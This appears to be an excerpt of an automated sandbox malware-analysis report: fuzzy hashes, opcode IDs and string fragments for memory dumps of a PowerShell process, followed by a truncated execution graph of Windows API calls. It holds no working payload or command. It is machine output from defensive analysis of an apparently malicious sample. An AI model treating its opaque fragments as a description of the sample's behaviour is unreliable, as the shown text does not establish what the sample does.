                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q
                                                                                  • API String ID: 0-1467158625
                                                                                  • Opcode ID: a3b37339d8d5df136c57daea3ab6bb331063116de5487c4014c20d9654b353b0
                                                                                  • Instruction ID: 183b0b54b62c98285e4ee2e8363ebb01da22fdfaa8a56768b15082751e17d896
                                                                                  • Opcode Fuzzy Hash: a3b37339d8d5df136c57daea3ab6bb331063116de5487c4014c20d9654b353b0
                                                                                  • Instruction Fuzzy Hash: 91E155B4A003189FEB24DB64CD98BAE77F2AB84304F1080E9D5095F795CB72ED818F91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $q$$q
                                                                                  • API String ID: 0-3126353813
                                                                                  • Opcode ID: e5e0e366d8914c7c012c75f9856665a811bab78edbb0ea56cd8d01a14428ec91
                                                                                  • Instruction ID: f5afc446c12a630fc0a59e8c14f70a710064fa3699514a186b1a1422ab687c1f
                                                                                  • Opcode Fuzzy Hash: e5e0e366d8914c7c012c75f9856665a811bab78edbb0ea56cd8d01a14428ec91
                                                                                  • Instruction Fuzzy Hash: 0011A3B5708247DFD7158A15D8C8E61BBB5EFC2314F1980ABDC04AB292DB72D980CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $q
                                                                                  • API String ID: 0-1301096350
                                                                                  • Opcode ID: 7488d2e94a97a2c573cb4af95d43409b5fabd546533d2e17ec3316488df5f5da
                                                                                  • Instruction ID: d0d3939135bdf4048674089c48f4ab2a8cec1ff8114d3bd86bb3e9c7095d2810
                                                                                  • Opcode Fuzzy Hash: 7488d2e94a97a2c573cb4af95d43409b5fabd546533d2e17ec3316488df5f5da
                                                                                  • Instruction Fuzzy Hash: CF817BB57043468FD7154B3998D8BAABFA6EFC2210F1880AFD845DB292D731C9C1C7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q
                                                                                  • API String ID: 0-1807707664
                                                                                  • Opcode ID: d54e4e9432581bbfcdbc73622d3431402eded59f1e5ee4bf55ef2c2b52922f7a
                                                                                  • Instruction ID: 49946c2d3bbf9a2362e6f89abe322cddb3e8f8ee77a60ac6ff04e2ad50045e11
                                                                                  • Opcode Fuzzy Hash: d54e4e9432581bbfcdbc73622d3431402eded59f1e5ee4bf55ef2c2b52922f7a
                                                                                  • Instruction Fuzzy Hash: FC314AF9A003129FDF245A6658D93BABBA3BF85210F14406BC901CF786EB35CA41C7E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tPq
                                                                                  • API String ID: 0-789928099
                                                                                  • Opcode ID: 46c4a6f0bf273fae410f621bcf4e38acb0da4c441053d7542f3fd9e302daa2ff
                                                                                  • Instruction ID: 0397ff4c21fcd0802f257c51708cdcb56e808defe346b989c1a395f2ea3eebdb
                                                                                  • Opcode Fuzzy Hash: 46c4a6f0bf273fae410f621bcf4e38acb0da4c441053d7542f3fd9e302daa2ff
                                                                                  • Instruction Fuzzy Hash: 9D4119B16093C19FC7129B64D8D5666BFB1AF46210F1A80DBE484CF293C732DD4AC7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 03d4bd2dace2ce9dc2ebda682e558139cfa13a314c90b95b4ac07166e9108383
                                                                                  • Instruction ID: 6537f02016af678df128d74d3c58896742e33d548fc0a76ab6b9a46a7d8930d1
                                                                                  • Opcode Fuzzy Hash: 03d4bd2dace2ce9dc2ebda682e558139cfa13a314c90b95b4ac07166e9108383
                                                                                  • Instruction Fuzzy Hash: A7625AB4B00204CFEB54CB98C4D8B6ABBF2AB89315F24C469D9059F359CB72ED46CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 009795da43c0f0595402fa8b64e86fa01185637db77613096856c394542ca21e
                                                                                  • Instruction ID: 5ff978f954d9028964637495d77f58ec95992efec36bec19d79527de7e8ec57e
                                                                                  • Opcode Fuzzy Hash: 009795da43c0f0595402fa8b64e86fa01185637db77613096856c394542ca21e
                                                                                  • Instruction Fuzzy Hash: D83259B4A00205CFDB54CF98C5D9EA9BBB2BB85314F24C4A9D9099F356C772ED41CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bb5b4f2d2e2c3648b2a11ab5c23206de8abc2780268e8b45984f114c20f38550
                                                                                  • Instruction ID: 0f9b679933bc2c5895a849b6e89e5e1084643051f4e834d7b74bedb8b2551543
                                                                                  • Opcode Fuzzy Hash: bb5b4f2d2e2c3648b2a11ab5c23206de8abc2780268e8b45984f114c20f38550
                                                                                  • Instruction Fuzzy Hash: 9B1257B4A00205CFDB14CF98D4D9E6ABBB2BB85315F24C0A9E9059F35ACB72ED45CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d95088e55c6d3c6d8636922406f3078362334b02430f8b11ebfc7e7664b21bf4
                                                                                  • Instruction ID: 119ba41a44b986e4afdb7c201f292b60c8bc217d29813cedcd4f46e3280c88fa
                                                                                  • Opcode Fuzzy Hash: d95088e55c6d3c6d8636922406f3078362334b02430f8b11ebfc7e7664b21bf4
                                                                                  • Instruction Fuzzy Hash: 7A910AB8A10205DFDB15CF58C5D8AA9BBB2FF89324F15C0AAD8046B355C772ED81CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2226a652339f95f1751f7435a427c6b8d5d1797ab79f81987c507a6a7ffd869d
                                                                                  • Instruction ID: e91d9d98ba20199322e538f2bcb70c7ed8e54acca9a8556e9bc021ff1e964c40
                                                                                  • Opcode Fuzzy Hash: 2226a652339f95f1751f7435a427c6b8d5d1797ab79f81987c507a6a7ffd869d
                                                                                  • Instruction Fuzzy Hash: A7318274B402049FE7149B64C869FAE7BA3AF89714F10C068E9016F795CF76DC418BA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3fcc22768c0984fb38be6881c69d3cd4bce0aa5fd44c3ba57b5382e4bd4e3406
                                                                                  • Instruction ID: c23f377f1da76c7709f410539268bdd95bc5af07a120d3ff053eb6d3b58effae
                                                                                  • Opcode Fuzzy Hash: 3fcc22768c0984fb38be6881c69d3cd4bce0aa5fd44c3ba57b5382e4bd4e3406
                                                                                  • Instruction Fuzzy Hash: 33012BB6304A658BD728966EE4C4627F7DA8BC1622B24803FDD05C3244DA32D746C361
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 233c6f1a0e08d2b60e74a849cbd454d7332e8b8c155f9b6afec09711d71f6c1f
                                                                                  • Instruction ID: a2a23431220076c866e9accbf724f6e26ff246030b9a747c174748745fd7fe79
                                                                                  • Opcode Fuzzy Hash: 233c6f1a0e08d2b60e74a849cbd454d7332e8b8c155f9b6afec09711d71f6c1f
                                                                                  • Instruction Fuzzy Hash: 72F06DB2609282DFD3028B04C9D4AA1BB72BF87301F09C0DAE2488F1D2C736D942CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$tPq$tPq$tPq$tPq$$q$(q$(q$(q$(q
                                                                                  • API String ID: 0-1570892024
                                                                                  • Opcode ID: d03e1eef611fece06826b058472a21f7a64456cf474a14cf7c9bcff7613990c2
                                                                                  • Instruction ID: f7e4a0190d1c2d6011e3888c7fbc72da2b1505aaa67032e7bccf75d752ad5804
                                                                                  • Opcode Fuzzy Hash: d03e1eef611fece06826b058472a21f7a64456cf474a14cf7c9bcff7613990c2
                                                                                  • Instruction Fuzzy Hash: F0A1D474B002169FDB248F55C4D9B6ABBE2BF89211F18846DED459F381CB31ED42CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                                                                                  • API String ID: 0-4104424984
                                                                                  • Opcode ID: 0bc7c8634491d3003ff8f1b5735723e74f20a49e7be0bd0461f4184ddbd8b727
                                                                                  • Instruction ID: 46659be0c44fed73a05f7e3343bb1813c68589bd3e811e68a7c9406dcd9c7d1f
                                                                                  • Opcode Fuzzy Hash: 0bc7c8634491d3003ff8f1b5735723e74f20a49e7be0bd0461f4184ddbd8b727
                                                                                  • Instruction Fuzzy Hash: 44C13AB1B0430A9FDB255A7698C87BABBE2FFC5211F18847AD905CB241DB32DD42C791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                                                                  • API String ID: 0-3456696661
                                                                                  • Opcode ID: 8f2077db3ed4f069aabd9dca6ce7b42504115a8fe3168a12ab5c7b28a6c5a4e0
                                                                                  • Instruction ID: 9883c946cd3a8572424a8e96b8f8ce344b9d2870cd83e58dc1104483f4884be8
                                                                                  • Opcode Fuzzy Hash: 8f2077db3ed4f069aabd9dca6ce7b42504115a8fe3168a12ab5c7b28a6c5a4e0
                                                                                  • Instruction Fuzzy Hash: 57A10BB1B0020A9FDB249BA5D4C976EBBE2BFC5312F1CC06AD9458B241EF31D942C791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                  • API String ID: 0-3999708322
                                                                                  • Opcode ID: 64835c0f61c4ea2ee74c5e010e1aafc002d31f3f09bcedfb4f03c98202b2f456
                                                                                  • Instruction ID: c67f0e81fac72801335dc3d0e15873c4e680781b5d1d7cbe6414412119bf72c5
                                                                                  • Opcode Fuzzy Hash: 64835c0f61c4ea2ee74c5e010e1aafc002d31f3f09bcedfb4f03c98202b2f456
                                                                                  • Instruction Fuzzy Hash: 9CE11BB5B0420ADFDF149B25D4C87AABBB2AFC6211F14806AD907CF255DB32DD41C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: XRq$XRq$XRq$tPq$tPq$$q
                                                                                  • API String ID: 0-422185277
                                                                                  • Opcode ID: 07290770ed92e9b54fc62afd8c18a4568a4b79e693e6355e7bc91b865e68906e
                                                                                  • Instruction ID: 50665d039f504e5d64d68cbec09386f21b1f6b1e633a7f554ff0dbaf657a27b2
                                                                                  • Opcode Fuzzy Hash: 07290770ed92e9b54fc62afd8c18a4568a4b79e693e6355e7bc91b865e68906e
                                                                                  • Instruction Fuzzy Hash: 0C610871B00606DFDB249B6984C8B6EBBF2AF89311F14C4AAE805BF255CB71DD41C791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$$q$$q$$q
                                                                                  • API String ID: 0-170447905
                                                                                  • Opcode ID: 7621d93c7602eb4488758bf861bf72749a7eaea753447648ca39191a92bcd099
                                                                                  • Instruction ID: 2e7c2eadbe488f3ad1951b4e7eb3675e8f726bae594216040f3d630604941839
                                                                                  • Opcode Fuzzy Hash: 7621d93c7602eb4488758bf861bf72749a7eaea753447648ca39191a92bcd099
                                                                                  • Instruction Fuzzy Hash: CF3188F2704307CFCB644A6A98E8676B7E1AFDA111B28817FD8538B145DA31E602C762
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$tPq$$q$$q$$q
                                                                                  • API String ID: 0-838716513
                                                                                  • Opcode ID: a961475071a2f8a996ee321f22ae0aa6f942606413032bbeee4761b0e85260da
                                                                                  • Instruction ID: 41dfce587efa0a41b2af4c009689b76999f339bfebf6cedc731fec9abd6239ad
                                                                                  • Opcode Fuzzy Hash: a961475071a2f8a996ee321f22ae0aa6f942606413032bbeee4761b0e85260da
                                                                                  • Instruction Fuzzy Hash: 834138B0A0424EDFDB248F56C5C97A5BBB2EF46322F0CC0AAD8445F292D731DA41CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$$q$$q$$q
                                                                                  • API String ID: 0-170447905
                                                                                  • Opcode ID: b2f48253d2e16a4590df463610e442c6e9ff50a0803f5216fc05fe3a7bfddc5a
                                                                                  • Instruction ID: 3dd03974d6dccfcfbcac5bdcc9c2645e689ac0c4a5d288b494e2f600b5dd1162
                                                                                  • Opcode Fuzzy Hash: b2f48253d2e16a4590df463610e442c6e9ff50a0803f5216fc05fe3a7bfddc5a
                                                                                  • Instruction Fuzzy Hash: 423158B5704287CFDF294A65D8DC276B7B1AFC5211F2884AAE8028B280DB31C542C762
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tPq$$q$$q$$q$$q
                                                                                  • API String ID: 0-3665043458
                                                                                  • Opcode ID: 37ef0949840973dc090ae2204d02fd72490888671c44ae29cea329cb2becf75a
                                                                                  • Instruction ID: ae803a69a616236f03bf38d3273601ab055ec0bc9ba608535036ead12254bded
                                                                                  • Opcode Fuzzy Hash: 37ef0949840973dc090ae2204d02fd72490888671c44ae29cea329cb2becf75a
                                                                                  • Instruction Fuzzy Hash: AF2100FA600216CFDB208E6AD5C8A7AB7B4FF40A20F19403BED019B351D731DA00CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tPq$tPq$tPq$tPq
                                                                                  • API String ID: 0-3476066832
                                                                                  • Opcode ID: 8a050847fd39c1d3e1d01ef15f7c415ca16e1fa8fd4b40f75b2880ac78ecbb21
                                                                                  • Instruction ID: d0e99771a2d326dd7d78454e0d97ea22c0ead4e8239d1ef8b8594bdcd31a3553
                                                                                  • Opcode Fuzzy Hash: 8a050847fd39c1d3e1d01ef15f7c415ca16e1fa8fd4b40f75b2880ac78ecbb21
                                                                                  • Instruction Fuzzy Hash: 64D129B8B003059FD7249B59D4D8B6ABBA2FFC9610F18846BE9459F381CA31DD42C791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $q$$q$$q$$q
                                                                                  • API String ID: 0-4102054182
                                                                                  • Opcode ID: c4dcf72ca6adcfed9c49085d9af3ea6b4035d652463b897a72e0d2c08f80b9a7
                                                                                  • Instruction ID: 13a871d2616e5e3344a9452a77c32d9b5082e3ed67676f35c839ccd43ed0872f
                                                                                  • Opcode Fuzzy Hash: c4dcf72ca6adcfed9c49085d9af3ea6b4035d652463b897a72e0d2c08f80b9a7
                                                                                  • Instruction Fuzzy Hash: 9F317DF07103166FEB38466958D5737678AAFC4715F208439A941CF7C2DE62DD4183A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $q$$q$$q$$q
                                                                                  • API String ID: 0-4102054182
                                                                                  • Opcode ID: fb21f62025ce4d8b98532e481eabe869c48f65bbe6111c8f40f7358c908ef8c3
                                                                                  • Instruction ID: ce7e85396b163cec0f7d7b638e1448621d8b8f2eda4cb9a67d256f03fb1ac105
                                                                                  • Opcode Fuzzy Hash: fb21f62025ce4d8b98532e481eabe869c48f65bbe6111c8f40f7358c908ef8c3
                                                                                  • Instruction Fuzzy Hash: A5218EB13103066BE734156A98D9F37B7D6ABC4315F24853AEA05E7381DD71D9818361
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $q$$q$$q$$q
                                                                                  • API String ID: 0-4102054182
                                                                                  • Opcode ID: 0666cdd92a1bc69bb8f11ea7cdca0f87b3262a377d989fd5874a196f4bf1a99b
                                                                                  • Instruction ID: 807269e0ec0a6e97558695cd73b47f42ba1fd4feb60ca69948b1269e927e9cf0
                                                                                  • Opcode Fuzzy Hash: 0666cdd92a1bc69bb8f11ea7cdca0f87b3262a377d989fd5874a196f4bf1a99b
                                                                                  • Instruction Fuzzy Hash: 6711B1F5A10307DFDB308E9695C8A76B7F0EF55218F18486ADC0997201DB35CA45CBA3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1854370935.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_7c60000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'q$4'q$$q$$q
                                                                                  • API String ID: 0-3199993180
                                                                                  • Opcode ID: 2ce8169264fc399faa77a009fdbde853b26804c2c8560cdeee323140ef6ac17c
                                                                                  • Instruction ID: 7db6edf4778b50ca6adefe0a350c50871444ec82ab1d61f38c3c3f17b908df6b
                                                                                  • Opcode Fuzzy Hash: 2ce8169264fc399faa77a009fdbde853b26804c2c8560cdeee323140ef6ac17c
                                                                                  • Instruction Fuzzy Hash: AB012691B0938A8FD72B42B824A82216FF29F83552B1E40D7C481DF39BCB554D068367
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:6.4%
                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                  Signature Coverage:1.9%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:82
                                                                                  execution_graph 40380 441819 40383 430737 40380->40383 40382 441825 40384 430756 40383->40384 40396 43076d 40383->40396 40385 430774 40384->40385 40386 43075f 40384->40386 40398 43034a memcpy 40385->40398 40397 4169a7 11 API calls 40386->40397 40389 4307ce 40390 430819 memset 40389->40390 40399 415b2c 11 API calls 40389->40399 40390->40396 40391 43077e 40391->40389 40394 4307fa 40391->40394 40391->40396 40393 4307e9 40393->40390 40393->40396 40400 4169a7 11 API calls 40394->40400 40396->40382 40397->40396 40398->40391 40399->40393 40400->40396 37672 442ec6 19 API calls 37846 4152c6 malloc 37847 4152e2 37846->37847 37848 4152ef 37846->37848 37850 416760 11 API calls 37848->37850 37850->37847 37853 4466f4 37872 446904 37853->37872 37855 446700 GetModuleHandleA 37858 446710 __set_app_type __p__fmode __p__commode 37855->37858 37857 4467a4 37859 4467ac __setusermatherr 37857->37859 37860 4467b8 37857->37860 37858->37857 37859->37860 37873 4468f0 _controlfp 37860->37873 37862 4467bd _initterm __wgetmainargs _initterm 37864 44681e GetStartupInfoW 37862->37864 37865 446810 37862->37865 37866 446866 GetModuleHandleA 37864->37866 37874 41276d 37866->37874 37870 446896 exit 37871 44689d _cexit 37870->37871 37871->37865 37872->37855 37873->37862 37875 41277d 37874->37875 37917 4044a4 LoadLibraryW 37875->37917 37877 412785 37909 412789 37877->37909 37925 414b81 37877->37925 37880 4127c8 37931 412465 memset ??2@YAPAXI 37880->37931 37882 4127ea 37943 40ac21 37882->37943 37887 412813 37961 40dd07 memset 37887->37961 37888 412827 37966 40db69 memset 37888->37966 37891 412822 37987 4125b6 ??3@YAXPAX 37891->37987 37893 40ada2 _wcsicmp 37894 41283d 37893->37894 37894->37891 37897 412863 CoInitialize 37894->37897 37971 41268e 37894->37971 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37897->37991 37901 41296f 37993 40b633 37901->37993 37904 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37908 412957 37904->37908 37914 4128ca 37904->37914 37908->37891 37909->37870 37909->37871 37910 4128d0 TranslateAcceleratorW 37911 412941 GetMessageW 37910->37911 37910->37914 37911->37908 37911->37910 37912 412909 IsDialogMessageW 37912->37911 37912->37914 37913 4128fd IsDialogMessageW 37913->37911 37913->37912 37914->37910 37914->37912 37914->37913 37915 41292b TranslateMessage DispatchMessageW 37914->37915 37916 41291f IsDialogMessageW 37914->37916 37915->37911 37916->37911 37916->37915 37918 4044cf GetProcAddress 37917->37918 37921 4044f7 37917->37921 37919 4044e8 FreeLibrary 37918->37919 37922 4044df 37918->37922 37920 4044f3 37919->37920 37919->37921 37920->37921 37923 404507 MessageBoxW 37921->37923 37924 40451e 37921->37924 37922->37919 37923->37877 37924->37877 37926 414b8a 37925->37926 37927 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37925->37927 37997 40a804 memset 37926->37997 37927->37880 37930 414b9e GetProcAddress 37930->37927 37932 4124e0 37931->37932 37933 412505 ??2@YAPAXI 37932->37933 37934 41251c 37933->37934 37936 412521 37933->37936 38019 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37934->38019 38008 444722 37936->38008 37942 41259b wcscpy 37942->37882 38024 40b1ab ??3@YAXPAX ??3@YAXPAX 37943->38024 37947 40ad4b 37956 40ad76 37947->37956 38048 40a9ce 37947->38048 37948 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37950 40ac5c 37948->37950 37950->37947 37950->37948 37951 40ace7 ??3@YAXPAX 37950->37951 37950->37956 38028 40a8d0 37950->38028 38040 4099f4 37950->38040 37951->37950 37955 40a8d0 7 API calls 37955->37956 38025 40aa04 37956->38025 37957 40ada2 37958 40adc9 37957->37958 37959 40adaa 37957->37959 37958->37887 37958->37888 37959->37958 37960 40adb3 